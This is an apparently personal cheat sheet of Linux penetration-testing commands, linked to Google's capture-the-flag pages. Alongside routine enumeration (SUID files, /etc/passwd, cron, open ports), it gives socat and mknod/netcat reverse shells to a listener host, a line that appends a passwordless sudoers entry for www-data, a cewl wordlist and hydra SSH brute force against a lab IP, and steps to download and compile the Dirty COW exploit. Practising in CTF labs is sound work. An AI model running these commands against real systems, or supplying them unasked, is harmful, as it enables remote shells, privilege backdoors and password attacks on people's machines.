
    https://capturetheflag.withgoogle.com/#beginners/
    https://github.com/google/google-ctf
    
    
    
    
    
    
    
    Find World Writable Folders
    find / -xdev -type d -perm -0002 -ls 2> /dev/null
    =====================================================
    Find World Writable Files
    find / -xdev -type f -perm -0002 -ls 2> /dev/null
===========================================================
    Find SUIDs
    find / -perm -4000 -user root -exec ls -ld {} \; 2> /dev/null
==================================================================
    Find SGID
    find / -perm -2000 -group root -exec ls -ld {} \; 2> /dev/null
=====================================================================
    DIstro Information
    cat /etc/*-release
=======================================================================
    Check open ports
    netstat -antup
===================================
    Check processes
    ps -elf
============================================
    Check processes running with root privileges
    ps -elf | grep root
==============================================
    Check running services
    cat /etc/services
=============================================
    Check installed packages
    dpkg -l
    rpm -qa
=================================================
    Check for sudo permissions
    sudo -l
=================================================
    Check OS architecture
    uname -a
====================================================
    Check cronjobs
    cat /etc/cron*
=======================================================
    Check fstab

    cat /etc/fstab
================================================
    Check network configuration
    ip addr
================================================
    Check contents of /etc/passwd
    cat /etc/passwd
===================================================
    Using socat
        Listen
          $ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
        Connect
          $ socat file:`tty`,raw,echo=0 tcp-listen:4444
=============================================================================
    Reverse connection using mknod
    mknod /tmp/backpipe p; /bin/sh 0< /tmp/backpipe | nc <ip> <port> 1> /tmp/backpipe; rm /tmp/backpipe
========================================================================================================
    Check version of an installed application
    dpkg -l <application name>
==============================================================
    Sometimes checking /opt /tmp /var /usr might help.
    Edit sudoers file and grant sudo access to the current user (www-data in this case) with no password
    echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers
    ================================================================
    to generate wordlist
cewl http://192.168.1.7:1898/?q=node/1 -w /root/boxs/list.txt
============================
hydra -l tiago -P /root/boxs/list.txt ssh://192.168.1.7
====================================================
ssh tiago@192.168.1.7
=================================
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
============================================================
dirtycow 2
https://www.exploit-db.com/download/40847.cpp
compileing
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
==================================================================================
locate -r '\.nse$' | xargs grep categories | grep 'default\|version\|safe' |grep smb
=======================================================================================
dnsrecon -d 192.168.1.1 -r 192.0.0.0/8
==============================================
nmap --script safe -p 445 192.168.1.5
=================================================
smbmap -H 192.168.1.2
===============================
